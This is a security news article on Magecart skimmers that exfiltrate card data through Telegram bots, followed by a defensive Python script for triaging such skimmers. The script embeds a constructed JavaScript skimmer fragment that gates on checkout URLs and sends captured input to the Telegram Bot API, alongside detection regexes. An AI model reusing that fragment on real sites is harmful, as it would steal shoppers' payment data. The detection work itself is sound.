Magecart Groups Use Telegram Channels to Exfiltrate Stolen Card Data
A security researcher known as Affable Kraut has found that web skimmer operators have started using Telegram channels to exfiltrate stolen card data. The finding draws on information from Sansec, a company specializing in combating digital skimming and Magecart attacks.
Originally, the name Magecart referred to a single hacker group that first began injecting web skimmers (malicious JavaScript) into online store pages to steal payment card data. However, this approach proved so successful that many copycat groups soon emerged, and the term Magecart became a generic label for this entire class of attacks. In 2018, RiskIQ researchers identified 12 such groups, but by the end of 2019, according to IBM, there were already about 40.
The researcher analyzed one of these malicious JavaScript scripts and noticed that it collects all data entered by victims into input fields and sends it to Telegram.
Before it leaves the page, the captured data is encrypted with a public key, so only the holder of the matching private key can read it; on the receiving side, a Telegram bot posts the stolen records into a chat as ordinary messages.
Affable Kraut notes that this exfiltration method appears to be quite effective, but it has a significant downside for the attackers: anyone who obtains the Telegram bot's token can take control of the process, and because the skimmer runs in the victim's browser, that token necessarily ships inside the script itself, where an analyst can recover it.
Jerome Segura, lead researcher at Malwarebytes, also took an interest in this script. After analyzing it, he reported that the skimmer's author hid the bot ID, the Telegram channel and the API requests behind nothing stronger than Base64 encoding, which is trivially reversible. Segura also published a diagram describing the entire attack process.
Segura points out that the skimmer only activates when the current browser URL contains certain keywords indicating an online store, and only when the user confirms a purchase. At that moment the payment details are sent both to the legitimate payment processor and to the criminals.
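As an added illustration (not code from the article or from the researchers it cites), the following Python script does what an analyst triaging such a skimmer would do with the two findings above: it pulls every quoted literal that parses as base64 out of a JavaScript sample, decodes it, and then looks for the Telegram Bot API host, a `sendMessage` call, a bot-token-shaped value, and the store-related keywords used to gate the skimmer. It reports what a plain grep of the source sees beside what appears after decoding. The skimmer fragment is constructed here to mimic the traits described; the token, chat id and keyword list are made-up placeholders, and the bot-token regex is an assumption about Telegram's `<numeric bot id>:<secret>` token layout rather than something taken from the article.

```python
import base64
import binascii
import re

# Heuristics for the traits described in the article. The bot-token pattern is an
# assumption about Telegram's "<numeric bot id>:<secret>" token layout, not a fact
# taken from the article; treat it as a triage hint, not proof.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{8,}={0,2})["\']')
TELEGRAM_API = re.compile(r"api\.telegram\.org", re.I)
BOT_METHOD = re.compile(r"/send(Message|Document|Photo)\b")
BOT_TOKEN = re.compile(r"(?<!\d)\d{6,12}:[A-Za-z0-9_-]{30,}")
CHECKOUT_WORDS = ("checkout", "onepage", "payment", "billing", "cart", "order")


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample in the style the article describes: endpoint, token, chat id and
# gating keywords are all base64 literals decoded with atob() at runtime. The token
# and chat id are made-up placeholders, not real identifiers.
SAMPLE_JS = "var _0x1=[%s];\n" % ",".join('"%s"' % _b64(s) for s in (
    "https://api.telegram.org/bot",
    "123456789:AAFAKE_TOKEN_FOR_ILLUSTRATION_ONLY_0000",
    "/sendMessage?chat_id=",
    "-1001234567890",
    "checkout", "onepage", "payment",
)) + r"""
function gate(){var u=location.href.toLowerCase();
  return [atob(_0x1[4]),atob(_0x1[5]),atob(_0x1[6])].some(function(k){return u.indexOf(k)>-1;});}
function exfil(p){var url=atob(_0x1[0])+atob(_0x1[1])+atob(_0x1[2])+atob(_0x1[3])
  +"&text="+encodeURIComponent(p);new Image().src=url;}
"""


def decode_literals(js):
    """Decode every quoted literal that parses as base64 into printable UTF-8 text."""
    decoded = []
    for m in B64_LITERAL.finditer(js):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not base64, or not text: skip it
        if text.isprintable():
            decoded.append(text)
    return decoded


def indicators(text):
    """Indicators of the Telegram exfiltration pattern visible in `text` as given."""
    return {
        "telegram_api": bool(TELEGRAM_API.search(text)),
        "bot_method": bool(BOT_METHOD.search(text)),
        "bot_tokens": BOT_TOKEN.findall(text),
        "checkout_keywords": [w for w in CHECKOUT_WORDS
                              if re.search(r"\b%s\b" % w, text, re.I)],
    }


def analyze(js):
    """Compare what a plain grep sees with what appears once base64 literals are decoded."""
    decoded = decode_literals(js)
    plain = indicators(js)
    full = indicators(js + "\n" + "\n".join(decoded))
    full["decoded_literals"] = decoded
    # Verdict: Telegram Bot API host plus either a bot method or a token-shaped value.
    full["verdict"] = full["telegram_api"] and bool(full["bot_method"] or full["bot_tokens"])
    return {"plain": plain, "decoded": full}


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_JS), indent=2))
```

Run as a script it prints both views of the sample: the plain view finds nothing, the decoded view shows the Telegram host, the `sendMessage` call, the token and the gating keywords. The same decode-then-match step is what makes the recovered token usable for the hijack Affable Kraut describes, which is why a skimmer hunt that only greps for `api.telegram.org` in raw page scripts will miss this family.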
Segura writes that this exfiltration mechanism is a very practical solution for attackers, since it spares them from building dedicated infrastructure. Moreover, defending against this type of skimmer is not easy: blocking connections to Telegram is only a temporary measure, because attackers can simply switch to another legitimate service to mask the data exfiltration.